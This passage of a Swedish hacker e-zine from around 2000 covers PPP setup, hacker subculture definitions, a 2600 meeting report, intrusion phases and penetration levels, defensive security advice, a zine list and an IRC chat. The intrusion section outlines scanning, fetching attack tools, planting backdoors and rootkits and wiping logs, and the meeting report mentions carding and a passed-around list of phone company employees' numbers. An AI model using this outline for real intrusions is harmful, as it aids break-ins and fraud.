# ifup ppp0
|
||
|
||
Modemet ringer nu upp och försöker ansluta. När modemet tystnat
|
||
och lamporna lugnat ner sig så kan du prova att pinga/surfa och
|
||
kolla så att det funkar. För att koppla ner skriver du:
|
||
|
||
# ifdown ppp0
|
||
|
||
Man kan behöva att koppla upp/ner några gånger innan det fungerar
|
||
riktigt.
|
||
|
||
- Utan PAP -
|
||
Om din isp inte stöder PAP så måste man ta reda på vilka strängar
|
||
som används vid inloggning. Det görs enklast med programmet
|
||
minicom.
|
||
|
||
# minicom
|
||
|
||
Ctrl + A och sedan Z poppar upp en meny över olika kommandon.
|
||
Välj D för att komma in i "Dialing Directory" och lägg till tel.
|
||
nummret till din isp. När du är klar, välj "Dial". När du är
|
||
uppkopplad så kan det hända två olika saker. Du får upp en
|
||
inloggningspromt eller så kör PPP igång. Om PPP kör igång så
|
||
stöder isp'n PAP och inge mer med det. Om du får en loginprompt
|
||
så loggar du in och noterar hur servern frågar efter loginnamn
|
||
och lösenord. När du loggat in och kommer till en prompt, så
|
||
testa att starta PPP på servern genom att skriva:
|
||
|
||
> ppp
|
||
|
||
PPP-förbindelsen avslutas med "++++" och du kopplar ner dig med
|
||
Ctrl + A och X
|
||
|
||
Nu så ska vi göra några inställningar för anslutningen. Starta
|
||
linuxconf och välj PPP/SLIP/PLIP. Välj ppp0. Under Communication
|
||
ska du fylla i dom textsträngar som du såg i minicom
|
||
|
||
Om servern frågar efter Username: så fyller du alltså i det i
|
||
första fösta fältet "Expect". Fyll inte i början av ordet
|
||
eftersom modemkommunikationen inte hinner lyssna av hela ordet.
|
||
Så istället för "username:" skriv "sername:", "login:" blir
|
||
"ogin:". När allt är ifyllt och klart, välj Accept. Sen när
|
||
du vill ansluta så använd ifup och ifdown för att koppla ner.
|
||
|
||
Det som jag gått igenom här är ett av många sätt att fixa en PPP-
|
||
anslutning i linux. Jag påstår inte att det är det bästa sättet,
|
||
men det funkar... och det borde vara det viktigaste.
|
||
|
||
|
||
Texten presenteras i samarbete med Team DreamVizion.
|
||
|
||
//////////////////////////////////////////////////////////////////
|
||
\ \
|
||
/ "Free speech is for everyone" /
|
||
\ \
|
||
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
|
||
|
||
|
||
|
||
//////////////////////////////////////////////////////////////////
|
||
| 10. Internet Pirater, eller? hedback|
|
||
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
|
||
|
||
Vem har missat den senaste tidens datavirus som "I love you",
|
||
Melissa och diverse varianter. Dessa virus var script som
|
||
drabbade användare av Outlook (i första hand). Sen så har vi
|
||
bråket mellan RIAA och Napster. Napster som har ökat i användar
|
||
antal med 480%(!) sedan dom blev stämda. Ganska bra reklam att
|
||
bli stämd med andra ord. Vidare har vi piratkopieringshärvor,
|
||
carding osv. Brottsligheten på intenet ökar kraftigt, men exakt
|
||
hur mycket vet man inte, men det som tveklöst ökar mest är
|
||
bedrägerier, förtal, handel med stöldgos och brott mot upphovs-
|
||
rätten. Olaglig kopiering av musik och dator program är de
|
||
upphovsrättsbrott som ökat mest. Dessa sk brott begås till
|
||
största delen av "tjuvar" och vanliga användare. Ofta i press så
|
||
drar man alla över en kamm. Det är en evig karusell med "hacker
|
||
stjäl bla bla" och "hacker tog sig in i bla bla". Sen så kan man
|
||
läsa i nån b-tidning att "Hackare är ofta snälla datornördar".
|
||
Ordet hacker har fått en viss nörd status, dels för att ordet
|
||
används i fel sammanhang och dels för att alla snorungar som kan
|
||
mailbomba nån kallar sig för nått som "3vil hxxor". För att inte
|
||
tala om alla som ska göra sig smarta och förklara vad ordet
|
||
egentlingen betyder. [sånna som jag =P]
|
||
|
||
I en artikel för ett tag sedan så kunde man läsa om vad dom olika
|
||
orden, som t ex hacker, cracker och phreaker betyder. Författaren
|
||
till artikeln heter Hans Nilsson men vi kallar honom för Hasse.
|
||
|
||
-=-
|
||
|
||
Lär dig skilja hackers från crackers!
|
||
|
||
Hackers är ganska oskyldiga (sv hackare)
|
||
En hackare är en person som vill lära sig så mycket som möjligt
|
||
om datorer, program och nätverk, i motsats till en >>normal<< an-
|
||
vändare som helst vill veta så lite som möjligt om sin dator,
|
||
program och uppkoppling. Det brukar även vara så att utforska
|
||
brister och dolda funktioner i datorsystem för att få nyttja
|
||
dessa för egen vinning eller för själva kunskapens egen skull.
|
||
Enligt New Hackers Dictionary, andra utgåvan [obs! andra utgåvan
|
||
:P//hedback], kommer ordet hacker från ett gammalt engelskt ord
|
||
för möbelsnickare.
|
||
|
||
Crackers gillar att förstöra (sv krackare)
|
||
En person som uppvisar de flesta egenskaper man brukar tillskriva
|
||
hackare, med den skillnaden att krackare inte drar sig för att
|
||
elektroniskt bryta sig in i andras värddatorer, nätverk och
|
||
datorsystem, eller blockerar åtkomsten till dessa. De värsta
|
||
avarterna förstör även de system som de tagit kontroll över.
|
||
Krackare förändrar även innehållet på hemsidor efter att de
|
||
olovligen skaffat sig tillgång till en webbserver.
|
||
|
||
Script-kiddies - unga och oförsående
|
||
Ofta påfallande unga användare som kallar sig hackers, men som
|
||
i allt väsentligt saknar avancerade kunskaper om nätverk och
|
||
programmering. De använder sig istället av färdiga program som
|
||
andra, mer erfarna hackers, tillverkat. Ofta sker detta utan att
|
||
Script-kiddies vet vad programmen utför och varför, vilket kan
|
||
leda till omfattande elektronisk skadegörelse.
|
||
|
||
Phreakers gillar telenätet
|
||
Personer som hyser samma fascination inför telefonnätverk som
|
||
hackare känner inför datornätverk. Phreaking räknas av många som
|
||
ursprunget för hacking. Numera har dessa två subkulturer i det
|
||
närmaste vuxit ihop eftersom telefonnätverken är datoriserade och
|
||
eftersom internet ofta körs över vanliga telefonlinjer. En
|
||
phreaker kan till exempel bryta sig in i ett telefonskåp i
|
||
källaren på ett hus och koppla in sig på någon annans telefon-
|
||
abonnemang.
|
||
|
||
Hemliga Cyberpunks (sv chifferpunkare)
|
||
Dessa förvarar passionerat rätten att få vara anonyma på nätet
|
||
samt ser det som en gundläggande rättighet att få skicka
|
||
elektroniska meddelande som inte går att avlyssna (avkoda) av
|
||
tredje part, till exempel myndigheter. Ligger ofta två steg före
|
||
nationell lagstiftning och exportlagar angående fri spridning av
|
||
stark kryptering
|
||
|
||
Spammers e-postbombar (sv spammare)
|
||
Kommersiella aktörer som nyttjar företags- och organisationers
|
||
e-post servrar för att göra olagliga massutskick till e-post-
|
||
adresser. För det mesta rör det sig om kedjebrevsliknande reklam,
|
||
men även extremistisk politisk propaganda har förekommit.
|
||
Avskydda av alla andra subkulturer.
|
||
|
||
Pirates spider program (sv pirater)
|
||
Personer som tar bort kopieringsskyddet på kommersiella dator-
|
||
program eller de som kopierar, sprider och/eller säljer dator-
|
||
program olagligt. Det finns även en uppsjö begrepp för roller
|
||
inom piratkulturen; traders/swappers (byter program med varandra)
|
||
och så vidare.
|
||
|
||
Coders - en egen livsstil (sv kodare)
|
||
Helt enkelt personer som har skapandet av datorprogram (och
|
||
program) som livsstil.
|
||
|
||
Virus-coders skapar problem (sv viruskodare)
|
||
Personer med talang och kunskaper för att tillverka själv-
|
||
replikerande datorprogram med ofarliga eller destruktiva egen-
|
||
skaper, så kallade datorvirus.
|
||
|
||
Hårda Tinkers
|
||
Någon som > >hackar< < hårdvara brukar kallas tinkers. Med andra
|
||
ord : undersöker dolda funktioner eller okända brister i
|
||
datorernas konstruktion. En tinker bygger inte sällan sin egen
|
||
dator med otagliga specialfunktioner.
|
||
|
||
-=-
|
||
|
||
Bara att hitta sin egna lilla grupp. Nja, är allt svart/vitt i
|
||
underground scenen? Skulle inte tro det. Hasses försök att
|
||
dela in alla i olika grupper håller inte nå vidare, för alla som
|
||
hållit på ett tag med något av det ovanstående vet att det är mer
|
||
eller mindre omöjligt att bara hålla sig till en eller två
|
||
subkulturer enbart. (undantag för spammers, som bör halshuggas).
|
||
|
||
|
||
Texten presenteras i samarbete med Team DreamVizion.
|
||
|
||
//////////////////////////////////////////////////////////////////
|
||
\ \
|
||
/ "Mathematic is the language of nature" /
|
||
\ \
|
||
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
|
||
|
||
|
||
|
||
//////////////////////////////////////////////////////////////////
|
||
|11. 2600seGBG Gotrex |
|
||
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
|
||
|
||
|
||
Jag hade bestämt med zaph0x att vi skulle träffas innan så
|
||
vi tog en burgare och snackade lite om allt möjligt..sedan
|
||
så går vi och möter alla vid nils ericssons terminalen...
|
||
där är typ är neodym, stainless, d_l0rd, master_od och en hel
|
||
del andra som talade för tyst för att jag kunde uppfatta
|
||
alla dom rätta stavelserna.. Jag sa till dom som har hand
|
||
om högtalaren att det var flera personer till hörande "grupp
|
||
2600" skulle träffas under den stora tavlan så ropade dom
|
||
ut det..det var kul.. jag gick och staljade med min ny in-
|
||
köpta 2600 t-shirt.. den hade en bra effekt att de flesta
|
||
påsåvis såg den och visste att dom hade hittat rätt.. vi
|
||
gick sedan i samlad trupp upp till vasaparken.. (ligger en
|
||
liten bit från avenyn bland annat) Försökte vara lite social
|
||
iaf och presentera mig... det gick väl sådär :D på vägen
|
||
träffade jag en gammal lärare (typiskt) och hon undrade nog
|
||
vad jag gjorde med alla dom där halv skumma människorna och
|
||
nån träffade nån som dom kände som jobbade på telia..
|
||
Därefter satte sig alla nästan i en ring.. (jag gissar på
|
||
att vi var ungefär 15-17 pers). kanske t.om 20 pers. eftersom
|
||
det var några som gick ganska snabbt.. alla presenterade sig
|
||
.. nya namn jag kommer ihåg Darknite, filt, paradoxx, jerm
|
||
tha sperm, axwell, MeglaW.. stavningen är inte på topp nu
|
||
.... det var mest några modiga som försökte prata ..inför
|
||
alla... frågan var hela tiden.. vad gör vi nu då? MeglaW
|
||
skickade runt en först en lista med felia anställdas tele-
|
||
fonnummer och ett kort för att komma in till, för mig ett
|
||
nytt ord, 'telia borgen'. som vi senare gjorde utflykt till
|
||
... sedan började många titta nån civil polis men vi såg
|
||
nog ingen... vissa berättade också att dom hade cardat en
|
||
diamant och matrox saker för en hel del.. sedan ringde Zitech
|
||
tror jag till och snackade med MeglaW och master_od. de
|
||
snackade lite om vad dom olika sysslade med och hur många
|
||
det var på respektive möte MeglaW ringde 112 för att det
|
||
var för lite poliser där.. vi kände oss inte så säkra :P
|
||
... sedan gick vi till den där 'telia borgen' som är ett
|
||
riktigt stort sten hus och MeglaW pekade ut att nummerupp-
|
||
lysningen som var där eller nåt sånt.. Gruppfoton togs och
|
||
sedan splittrades vi och några gick.. resten fick till kebab
|
||
grillen och käkade kebab.. sedan tog mötet slut ca: 20:00
|
||
jag föreslog att nästa möte skulle äga rum i nån mc donalds
|
||
eller burger king och nästa mötets tema skulle vara ("Kunskap?")
|
||
att alla tar med sig lite roliga attribut m.m t.ex. som
|
||
DarkNite skulle ta med sig alla nummer av 2600 pappers
|
||
tidningarna.
|
||
|
||
|
||
//////////////////////////////////////////////////////////////////
|
||
\ \
|
||
/ ######## ######## ######## ######## /
|
||
\ ########## ########## ########## ########## \
|
||
/ ### ### ### ### ### ### ### ### /
|
||
\ ### ### ### ### ### ### \
|
||
/ ### ######### ### ### ### ### /
|
||
\ ### ### ### ### ### ### ### \
|
||
/ #### ### ### ### ### ### ### ### /
|
||
\ ########## ########## ########## ########## \
|
||
/ ######### ######## ######## ######## /
|
||
\ [ - 2 6 0 0 N E T - ] \
|
||
/ irc.2600.net /
|
||
\ \
|
||
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
|
||
|
||
|
||
|
||
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
|
||
| 12. Faserna i ett IT-anfall Zynta^x |
|
||
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
|
||
|
||
Hur arbetar egentligen en "cracker" när han tar sig in i t ex
|
||
ett nytt system?? Har han nån plan, strategi, speciellt till-
|
||
vägagångs sätt.. hmm ja oftast så e det på samma sorts väg alla
|
||
arbetar på. Jaja ni kanske tycker jag tjatar för mycket och det
|
||
kanske låter lite väl dramatiskt, men det beror enbart på att
|
||
jag tänker på hur många kebab tallrikar Ncode har käkat. Och så
|
||
grymma arbete med att lägga ner cisco servrar. Så back to Work ;)
|
||
Vi ska nu gå igenom ett sätt (strategi) som många använder och som
|
||
oftast fungerar.
|
||
|
||
Fas .1
|
||
Informationsinsamling. Crackern samlar information om måldatorn som
|
||
är allmänt tillgängligt. WWW och News kan innehålla mycket infor-
|
||
mation om ett annat datorsystem. Denna fas kan ta ganska lång tid.
|
||
|
||
Fas .2
|
||
Crackern bestämmer vilken typ av dator och vilket operativsystem
|
||
"målet" har.Han tar reda på måldatorns tjänster. Detta kan göras
|
||
med sk port scanners, program som undersöker trafiken på mål-
|
||
datorns portar. [Ed.'s note: Läs Ncodes "Säkerhets analys av en
|
||
Unix Burk" på http://www.2600hz.net/].
|
||
|
||
Fas .3
|
||
Han letar fel och brister i det operativsystem och andra tjänster
|
||
som måldatorn kör. Många crackers har en lista med kända
|
||
säkerhetshål.
|
||
|
||
Fas .4
|
||
Crackern laddar ner attackverktyget från någon annan server och
|
||
skriver in rätt kommandon till verktyget eller skickar dem direkt
|
||
till tjänsten i måldatorn. Han improviserar om någon försökt
|
||
täppa till hålet. Nu får crackern visa hur skicklig han är.
|
||
|
||
Fas .5
|
||
Om attacken lyckades, kan han installera bakdörrar, rootkits,
|
||
sniffers eller stjäl och förstör data. Han städar upp alla
|
||
spår i loggar så att intrånget inte syns. Om attacken misslyckades,
|
||
börjar han om från en tidigare fas.
|
||
|
||
|
||
|
||
zyntax@SweHPA.com
|
||
|
||
//////////////////////////////////////////////////////////////////
|
||
\ \
|
||
/ "Att hacka handlar inte om att lyckas, det handlar mer om /
|
||
\ att upptäcka. Även om det skulle finnas något som hette \
|
||
/ fullständig säkerhet, kommer det alltid att finnas nya /
|
||
\ system, nya uppfinningar, nya attackvägar. Hackern är \
|
||
/ nödvändig för att förbättra säkerheten, och vi blir inte /
|
||
\ så lätt uttråkade." \
|
||
/ - Emmanuel Goldstein, 2600: The Hacker Quarterly /
|
||
\ \
|
||
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
|
||
|
||
|
||
|
||
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
|
||
| 13. Datorsystemets Penetreringsnivåer Zynta^x |
|
||
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
|
||
|
||
Varje attack kan bestå av flera steg där man bryter sig
|
||
djupare och djupare in, ungefär som att gräva en tunnel.
|
||
|
||
|
||
*****************************************************************
|
||
Nivå .1 -Denial Of Service attacker-
|
||
*****************************************************************
|
||
Nivå ett är hindrande av tjänst och innebär ett tillfälligt
|
||
stopp av en dator genom att få den att krascha eller att
|
||
gå väldigt långsamt.
|
||
|
||
|
||
|
||
*****************************************************************
|
||
Nivå .2 -Lokal användare kan läsa-
|
||
*****************************************************************
|
||
Här har man skaffat sig ett användarnamn på datorn inklusive
|
||
ett hembibliotek och allt vad det innebär. Man kan läsa en
|
||
del filer, ibland också känsliga systemfiler.
|
||
|
||
|
||
|
||
*****************************************************************
|
||
Nivå .3 -Lokal användare kan skriva-
|
||
*****************************************************************
|
||
"Behörighet" att inte bara skriva filer i sitt eget hembibliotek
|
||
utan även i en del känsliga bibliotek, som t ex webserverns
|
||
bibliotek för cgi-script.
|
||
|
||
|
||
|
||
*****************************************************************
|
||
Nivå .4 -Yttre angripare kan köra begränsade kommandon-
|
||
*****************************************************************
|
||
|
||
"Behörighet" att köra vissa kommandon eller program på datorn.
|
||
Ofta utan inloggning. Man kan även påverka datorns inre
|
||
systemtillstånd.
|
||
|
||
|
||
|
||
*****************************************************************
|
||
Nivå .5 -Yttre angripare kan köra alla kommandon och program-
|
||
*****************************************************************
|
||
Man kan köra alla program på datorn, samt läsa och skriva var
|
||
man vill, och utan större problem gå till Nivå .6
|
||
|
||
|
||
|
||
*****************************************************************
|
||
Nivå .6 -Root eller Administratör. (Fulla behörigheter)-
|
||
*****************************************************************
|
||
Datorn är helt crackad. Angriparen har full tillgång till hela
|
||
datorn och kontrollerar den fullständigt.
|
||
|
||
|
||
|
||
zyntax@SweHPA.com
|
||
|
||
//////////////////////////////////////////////////////////////////
|
||
\ /
|
||
/ "Fantasi är viktigare än kunskap" \
|
||
\ - Albert Einstein" /
|
||
/ \
|
||
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
|
||
|
||
|
||
|
||
|
||
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
|
||
| 14. Bra metoder för att förhinda dataintrång Zynta^x |
|
||
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
|
||
|
||
haha jag drömde att min far sade till mig -hördudu Zynta^x en
|
||
riktig hacker lämnar inga spår efter sig. Bara amatörerna
|
||
blir rubliker. Så därför tänkte jag nu skriva om hur du
|
||
kan skydda dig mot just dataintrång.
|
||
|
||
Idag är datorer en jävligt stor del av världens infra-
|
||
struktur. Så det är ju ganska viktigt att skydda dom också....
|
||
Nu är det ju så att dom flesta system är nätverksbaserade
|
||
och uppkopplade via förmedlande protokoll som t ex TCP/IP
|
||
vilket gör det lätt att ansluta sig till ett sådant system.
|
||
Då måste vi alltså skydda nätverksanslutna datorer genom att
|
||
|
||
*tillhanda hålla logiska skydd mot den yttre omgivningen.
|
||
|
||
*använda kryptering och stark autentisering.
|
||
|
||
*logiskt försvara individuella värddatorer(hosts).
|
||
|
||
|
||
Nedan beskrivs ett antal inriktningar för att förbättra
|
||
skyddet mot intrång. Beskrivningar anger bara några av de
|
||
viktigaste åtgärder man bör känna till.
|
||
|
||
|
||
+Brandväggar.
|
||
|
||
Brandväggar, kan vara ett bra initialt skydd för ett
|
||
nätverksanslutet datorsystem, men det vanligaste problemet
|
||
med dessa är brandväggens många inställningsmöjligheter som
|
||
gör att de lätt kan bli felinställda t ex genom att:
|
||
|
||
|
||
*tillåta vad som helst från vem som helst, the goof up.
|
||
|
||
*släppa igenom farliga tjänster
|
||
|
||
*ha låg säkerhet som förval t ex genom att ha ett domain name
|
||
system, DNS ger ifrån sig viktig information som underlättar
|
||
ett intrång eller att låta internet control message protocol,
|
||
ICMP ge sådan information så att den tipsar en hacker om
|
||
systemets möjligheter.
|
||
|
||
*tillåta åtkomst av interna nätverkstjänster såsom fjärrin-
|
||
loggning, e-post, filöverföring m.m utan stark autentisering.
|
||
Ingen brandvägg är den andra lik. Det finns fyra populära
|
||
teknologier. Oftast är den hybrid av flera produkter:
|
||
|
||
*normal enkel paketfiltrering, filtrerande router - som svagast
|
||
|
||
*portbegränsning, socket relays - marginellt bättre
|
||
*intelligentare paketfiltrering (FW-1), en rejäl förbättring
|
||
men fortfarande problematisk
|
||
|
||
*analys av innehåll, application gateway - säkrare men långsammare.
|
||
|
||
+System för upptäckt av intrång.
|
||
|
||
System för upptäckt av intrånget kallas "intrusion detecting
|
||
systems, IDS". Det används för att detektera kända mönster
|
||
som kan påvisa att det pågår ett försök till intrång eller
|
||
att ett intrång redan genomförts. IDS finns i olika varianter
|
||
som t ex:
|
||
|
||
|
||
*paketsniffare och mönstermatchare (signaturdetektering)
|
||
|
||
*övervakare av kända mönster i loggar
|
||
|
||
*trafikmätare
|
||
|
||
*anomaliupptäckare (händelser som inte borde finnas i systemet)
|
||
eller detektering av förändringar.
|
||
Ett IDS-system kan antingen vara en egen värddator eller ett
|
||
nätverksbaserat system.
|
||
|
||
|
||
+Övervakning av uppkopplingar.
|
||
För att kunna upptäcka intrånget gäller det att övervaka
|
||
datorsystemet och dess uppkopplingar. Det finns produkter
|
||
som övervakar och skriver ut aktuella TCP-anslutningar,
|
||
visar valda anslutningar på en bildskärm eller tar över
|
||
eller avslutar en utvald anslutning. Ett problem med detta
|
||
är dom juridiska aspekterna på övervakning och visa
|
||
lösenord eller annan känslig information.
|
||
|
||
+Inbrottslarm.
|
||
Ett logisktinbrottlarm är en del i ett flernivåskydd. Om
|
||
brandväggen passeras av en angripare bör ett larm reagera på
|
||
aktiviteter innanför brandväggen. Larmet bör varna för
|
||
aktiviteter som inte borde hända vid just den tidpunkten
|
||
eller i den "formen".
|
||
|
||
+Personal och logging.
|
||
Kunnig och utbildad personal är ett måste för effektiva
|
||
motåtgärder. Mänsklig reaktion på larm ska finnas och det
|
||
kan inte påpekas tillräckligt ofta att en logg av
|
||
aktiviteter är ytterst viktig för effektiva motåtgärder.
|
||
Loggen måste ständigt övervakas av det mänskliga ögat för
|
||
att man ska kunna upptäcka intrång och intrångsförsök.
|
||
|
||
+Uppdateringar.
|
||
Det är mycket viktigt att hänga med i intrångsutvecklingen
|
||
eftersom det dagligen upptäcks nya sätt att ta sig in i
|
||
system. En av de viktigaste förutsättningarna för att hack-
|
||
are ska ligga steget före är att de snabbt och effektivt
|
||
kan byta information med likasinade. JU FLER SOM HJÄLPS ÅT
|
||
desto större är sannolikheten att de ska lyckas.
|
||
Ett effektivt skydd bör därför bestå av en motsvarande öppen
|
||
informationsspridning mellan de som försöker skydda systemen.
|
||
Ju mer information som utväxlas mellan parter om intrång och
|
||
intrångsförsök, desto större är chansen att förhindra nya
|
||
angrepp. Detta leder då till att öppna och icke kommersiella
|
||
programvaror är att föredra eftersom fler kan analysera dessa
|
||
och hitta sårbarheter som kan delas öppet med andra.
|
||
|
||
+Engångslösenord.
|
||
Engångslösenord gör sniffning, knäckning och lösenordsstöld
|
||
ineffektiv. Tvåfaktorssytem (någonting du vet och någonting du
|
||
har eller är), t ex en PIN-kod tillsammans med en lösenords-
|
||
genererare, ger stark autentisering. Det problem som kan
|
||
finnas med engångslösenord är stora kostnader för im-
|
||
plementeringen och administreringen och att skydda autent-
|
||
iseringsservern mot intrång.
|
||
|
||
+Engångsloggning.
|
||
|
||
Engångsloggning, single sign on, kombinerad med stark autent-
|
||
isering ger ännu bättre säkerhet via en centraliserad
|
||
kontroll och logging av nätverksbaserad aktivitet.
|
||
Med engångsloggning menas att man bara loggar in på ett
|
||
ställe med ett lösenord (säkerhetsserver), för att sedan få
|
||
tillgång till flera olika system, i motsats till att logga
|
||
in i olika system med olika lösenord. Engångsinloggning är
|
||
säkrare och smidigare.
|
||
|
||
+Kryptering.
|
||
Kryperingsteknik är i sig ingen lösning, men en del av flera
|
||
lösningar som kan användas som motmedel mot intrång. Teknikerna
|
||
*secure socket layer(SSL)
|
||
*secure shell (SSH)
|
||
*virtual private network (VPN)
|
||
skyddar data under dess transport mellan system och förhindrar
|
||
lösenordssniffning och dataläsning.
|
||
|
||
Återskapande av ett intrång.
|
||
Om ett intrång har skett måste man få fram material för
|
||
eventuell polisutredning (hehe lol eller hur) och återställa
|
||
systemet till det skick det hade innan intrånget skedde.
|
||
För att ta reda på vad som har hänt fram tills dess att
|
||
intrånget skedde, gäller det att logga nätverksaktiviteter som
|
||
sker och ta en ögonblicksbild av systemets inställninga när
|
||
intrånget skedde.
|
||
En strategi för återskapande av ett system efter intrång omfattar
|
||
ungefär så här:
|
||
*att ändra samtliga användares lösenord(efter att en sniffer upptäckts)
|
||
*att ominstallera systemprogramvaran (eller ändra delar av den, om
|
||
det finns en ögonblicksbild)
|
||
*att åtgärda aktuella sårbarheter.
|
||
|
||
+Spåra intrång.
|
||
Att spåra intrång är en indirekt metod för att förhindra
|
||
framtida intrång genom att hitta och åtala en angripare
|
||
(hmm ;( ) Det är endast den naiva och okunniga angriparen
|
||
som jobbar från sin egen hemadress och hemdator. En proff-
|
||
esionell angripare "tvättar" anslutningar genom att bryta sig
|
||
in i oskyddade system och använda dessa som språngbräda mot
|
||
andra system. Det gör att en sådan angripare kan vara
|
||
omöjlig att hitta. I pressen ser man ofta att tonåringar
|
||
(alltså vi :) ) gjort intrång. De har förmodlingen inte varit
|
||
tillräckligt skickliga att dölja sina spår. De riktigt stora
|
||
lagbrytarna lär vara ytterst svåra att finna utan ett speciellt
|
||
skickligt och tidskrävande utredningsarbete. Vid spårning av
|
||
ett angrepp, börjar man vanligtvis med käll IP-adressen, ifall det
|
||
inte är denial of service-angrepp som normalt förfalskar
|
||
IP-adresser eller använder personers adresser. Använd därför
|
||
först din dators egna informationsfunktioner för att hitta
|
||
angriparens tekniska anslutning vilket är det företag som
|
||
tillhandahåller Internetanlutningen till källnätverket. Du kan
|
||
t ex använda en nätbläddrare för att hitta anslutningspunkten
|
||
för angreppet. Kontakta därefter din Internetleverantör du
|
||
hittat i din logg och begär hjälp. Det visar sig då oftast
|
||
att du får upprepa denna process eftersom det troligtvis är
|
||
flera leverantörer inblandade....
|
||
|
||
|
||
|
||
zyntax@SweHPA.com
|
||
|
||
//////////////////////////////////////////////////////////////////
|
||
\ \
|
||
/ "Hey, hey, hey - be careful out there..." /
|
||
\ \
|
||
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
|
||
|
||
|
||
|
||
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
|
||
| 15. Svenska h/p zines A till Ö Gotrex |
|
||
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
|
||
|
||
Dessa zines finns nu på vår sida. De är speciellt utvalda men
|
||
om det finns nåt *bra* svenskt h/p zine som saknas så låt mig
|
||
veta. http://members.xoom.com/_XMCM/msadf/zines
|
||
|
||
Digital Wannabee's
|
||
n/a
|
||
|
||
Flashbacks News Agency
|
||
http://www.flashback.se
|
||
|
||
Gothenburg Secret Service
|
||
http://www.GothenburgSecretService.net
|
||
(http://members.xoom.com/_XMCM/msadf/)
|
||
|
||
Guide To (mostly) Harmless Hacking [svensk översättning]
|
||
http://w1.340.telia.com/~u34002171/hhd.html
|
||
|
||
Klan of the BloodStained Blade
|
||
n/a
|
||
|
||
Kryptorama
|
||
http://go.to/Kryptorama
|
||
|
||
Liberalt Oorganiserat Drägg
|
||
n/a
|
||
|
||
Masters Of Information
|
||
n/a
|
||
|
||
Mr. Headache's Underground
|
||
http://www.mrheadachesmagazine.com
|
||
|
||
Outlaw Informativa
|
||
http://www.2600hz.net/
|
||
|
||
PFA
|
||
http://www.zaph0x.com
|
||
|
||
TheRentor
|
||
n/a
|
||
|
||
Several Errors Hidden
|
||
http://c5.hakker.com/seh/
|
||
|
||
Swedish Phreakerz Association
|
||
n/a
|
||
|
||
STREETWHORE
|
||
http://www.teliasuger.com
|
||
|
||
Swehack Underground Zine
|
||
http://swehack.cjb.net
|
||
|
||
The Aberrants Zine
|
||
n/a
|
||
|
||
TheNetw0rk Zine
|
||
http://www.thenetw0rk.cjb.net/
|
||
|
||
THE SWEDISH UNDERGROUND EROTIC E-ZINE from Heretics Inc
|
||
http://www.2600hz.net/
|
||
|
||
United Phreakers of $weden
|
||
http://www.upos.cjb.net
|
||
|
||
Vanliga Svenska Priikers
|
||
n/a
|
||
|
||
West Swede Priiker Alliated
|
||
n/a
|
||
|
||
//////////////////////////////////////////////////////////////////
|
||
\ /
|
||
/ "If your goal is to understand your network from a 40,000- \
|
||
\ foot view, then Windows port scanning tools will suffice. /
|
||
/ But if you're serious about your security and looking for \
|
||
\ the holes that crackers will find, then take the time to /
|
||
/ install a Linux box and use nmap." \
|
||
\ - Infoworld /
|
||
/ \
|
||
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
|
||
|
||
|
||
|
||
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
|
||
| 16. Intervju med pewp ang. S&S artikeln Gotrex |
|
||
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
|
||
|
||
*disskusion om den kontroversiella artikeln i Säkerhet & Sekretess*
|
||
|
||
<Gotrex> är det du på din bild?
|
||
<Gotrex> asså den svarta
|
||
<pewp> japp, passfoto
|
||
<Gotrex> bra att veta, typ
|
||
<pewp> hehe, varför det
|
||
<pewp> man ser inget juh
|
||
<pewp> men jag kommer försvinna
|
||
<Gotrex> för då vet dom vad du heter
|
||
<Gotrex> försvinna?
|
||
<pewp> inget IRC mer för mig mer
|
||
<Gotrex> hokus pokus
|
||
<pewp> nej jag ringde och snackade med dom, de vet ALLT om mig
|
||
<pewp> hokus pokus, ingen pewp längre
|
||
<Gotrex> allvarligt?
|
||
<Gotrex> vad sa dom då?
|
||
<pewp> japp...
|
||
<Gotrex> har dom nån anledning till det?
|
||
<pewp> de sa förmycket
|
||
<Gotrex> frågan är inte om det enbart är för att skrämmas den här
|
||
artikeln..
|
||
<pewp> tror inte det, de visst förmycket
|
||
<Gotrex> men vadådå?
|
||
<Gotrex> har dom några bevis?
|
||
<pewp> jag vet att det är sant
|
||
